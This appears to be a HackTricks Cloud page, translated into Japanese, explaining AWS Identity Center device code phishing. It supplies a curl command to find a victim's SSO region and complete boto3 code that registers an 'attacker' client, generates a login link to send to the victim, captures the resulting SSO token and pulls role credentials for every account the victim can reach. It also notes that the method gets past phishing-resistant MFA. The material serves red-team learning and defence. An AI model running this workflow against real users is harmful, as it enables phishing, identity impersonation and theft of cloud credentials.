AWS - Identity Center & SSO Unauthenticated Enum

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

AWS デバイスコードフィッシング

最初にこのブログ記事で提案されたように、AWS SSOを使用しているユーザーにリンクを送信することが可能で、ユーザーが承認すると、攻撃者はユーザーを偽装するためのトークンを取得し、Identity Centerでユーザーがアクセスできるすべてのロールにアクセスできるようになります。

この攻撃を実行するための要件は次のとおりです：

被害者はIdentity Centerを使用している必要があります
攻撃者は被害者が使用しているサブドメインを知っている必要があります <victimsub>.awsapps.com/start

前述の情報だけで、攻撃者はユーザーにリンクを送信でき、承認されると攻撃者はAWSユーザーアカウントへのアクセスを得ることができます。

攻撃

サブドメインの特定

攻撃者の最初のステップは、被害者の会社がIdentity Centerで使用しているサブドメインを特定することです。これはOSINTまたは推測 + ブルートフォースを使用して行うことができ、ほとんどの会社はここで自社名またはそのバリエーションを使用しています。

この情報をもとに、Identity Centerが設定されたリージョンを取得することが可能です：

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1

被害者のリンクを生成して送信する

次のコードを実行して、被害者が認証できるAWS SSOログインリンクを生成します。デモのために、このコードをPythonコンソールで実行し、後でトークンを取得するためにいくつかのオブジェクトが必要になるので、終了しないでください：

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

生成したリンクを被害者に送信し、あなたの素晴らしいソーシャルエンジニアリングスキルを使いましょう！

被害者がそれを受け入れるのを待つ

被害者がすでにAWSにログインしている場合、権限を付与することを受け入れるだけで済みます。ログインしていない場合は、ログインしてから権限を付与することを受け入れる必要があります。これが現在のプロンプトの見た目です：

SSOアクセストークンを取得する

被害者がプロンプトを受け入れた場合、このコードを実行してユーザーを偽装してSSOトークンを生成します：

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

SSOアクセストークンは8時間有効です。

ユーザーを偽装する

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

フィッシング不可能なMFA

以前の攻撃が**「フィッシング不可能なMFA」（webAuth）が使用されていても機能することを知るのは楽しいです。これは、以前のワークフローが使用されているOAuthドメインを離れないためです。他のフィッシング攻撃のようにユーザーがログインドメインを偽装する必要があるのではなく、デバイスコードワークフローが準備されているため、デバイスによって知られているコードがあり、ユーザーは異なるマシンでもログインできます。プロンプトを受け入れると、デバイスは初期コードを知っているだけで**、ユーザーのために資格情報を取得することができます。

詳細については、この投稿を確認してください。

自動ツール

参考文献

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

PreviousAWS - IAM & STS Unauthenticated Enum NextAWS - IoT Unauthenticated Enum

Last updated 3 days ago